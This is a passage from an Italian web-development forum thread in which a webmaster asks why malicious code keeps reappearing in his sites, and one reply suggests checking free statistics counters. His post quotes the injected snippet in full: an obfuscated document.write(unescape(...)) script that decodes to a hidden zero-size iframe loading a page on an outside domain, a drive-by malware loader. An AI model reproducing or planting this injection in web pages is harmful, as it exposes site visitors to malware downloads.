Pagina 1 di 3 1 2 3 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 24
    Utente di HTML.it

codice maligno nelle mie pagine web...help me!

Salve a tutti, sono un nuovo iscritto....ho un grosso problema spero che Voi possiate aiutarmi.
    Non sono un grosso esperto ma come seconda attività creo e gestisco alcuni siti web (circa 15) e ultimamente in tutti i miei siti si è inserito un codice "maligno" che vi riporto:

<body bgcolor="#356893" link="#FF9933" vlink="#FF9933" alink="#FF9933"><script type="text/javascript">
    <!--
    document.write(unescape('%3C%69%66%72%61%6D%65%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E %76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%6 4%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20% 68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65 %3E'));
    //-->
    </script>

tale codice, credo, provvede ad aprire un altro indirizzo effettuando un download di qualke file exe o rabba simile, sta di fatto che i miei antivirus lo rivelano!
    nonstante io provveda a rimuoverlo da tutte le pagine html , per magia, dopo un po', ricomapare....
    Ho provato anche a cambiare le psw ftp del mio host .....ma niente!
    l'unica soluzione adesso da me adottata è stata la completa rimozione di tutti i file presenti nel mio spazio con conseguente frustrante disservizio per i miei cliente!
    Anche la pagina semplice "sito in manutenzione" dopo un po' viene infettata!
    P.s. ho anche formattato il mio pc e analizzato per bene tutte le mie pagine html.
    Spero che qualcuno possa aiutarmi! Saluti Antonello

Ciao
    Non mi intendo di come possa venire inserito codice nelle pagine web però, tannt'è che stavo leggendo un pò e di sabato pomeriggio c'è in giro poca gente penso:
    nelle pagine hai inserito qualche contatore di statistiche free ? talvolta sono questi i primi d controllare. A me successe tempo fa per cui te ne faccio voce
    Per altre cose non saprei dire per cui lascio il problema a qualcuno competente
    Ciao